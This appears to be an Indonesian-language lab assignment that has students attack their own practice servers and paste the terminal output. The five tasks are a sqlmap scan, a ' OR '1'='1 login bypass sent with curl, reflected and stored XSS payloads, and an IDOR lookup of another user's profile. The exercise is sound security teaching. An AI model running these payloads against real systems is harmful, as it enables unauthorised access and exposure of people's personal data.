Selesaikan 5 tugas berikut di VM Kali Linux Anda, targetkan server lab yang sesuai. Salin dan tempelkan **output terminal LENGKAP** (termasuk perintah yang Anda jalankan) atau jawaban yang diminta.
Gunakan sqlmap untuk memindai halaman product.php di lab SQLi (Port 8080). Jalankan sqlmap -u "http://[IP_ANDA]:8080/product.php?id=1" --batch dan tempel seluruh output terminal Anda di bawah.
sqlmap
product.php
sqlmap -u "http://[IP_ANDA]:8080/product.php?id=1" --batch
Gunakan curl untuk mengirim payload bypass SQLi ke halaman index.php (Port 8080). Jalankan curl -X POST -d "username=' OR '1'='1&password=test&Login=Login" "http://[IP_ANDA]:8080/index.php" dan tempel seluruh output terminal Anda.
curl
index.php
curl -X POST -d "username=' OR '1'='1&password=test&Login=Login" "http://[IP_ANDA]:8080/index.php"
Gunakan curl untuk membuktikan Reflected XSS di lab XSS (Port 8081). Jalankan curl "http://[IP_ANDA]:8081/search.php?q=<script>alert(1)</script>" dan tempel seluruh output terminal Anda (yang menunjukkan payload tercermin di HTML).
curl "http://[IP_ANDA]:8081/search.php?q=<script>alert(1)</script>"
Di lab XSS (Port 8081), pertama gunakan browser Anda untuk submit payload <script>alert('stored')</script> di guestbook.php. Kedua, gunakan curl untuk mengambil halaman guestbook.php. Jalankan curl http://[IP_ANDA]:8081/guestbook.php dan tempel seluruh output terminal Anda (ini akan membuktikan payload Anda tersimpan).
<script>alert('stored')</script>
guestbook.php
curl http://[IP_ANDA]:8081/guestbook.php
Di lab IDOR (Port 8082), login sebagai "Pengguna Anda (ID 1)". Kemudian, ganti URL di browser Anda secara manual ke profile.php?id=2. Tempel data sensitif (email atau no. hp) milik "User Lain" yang berhasil Anda lihat.
profile.php?id=2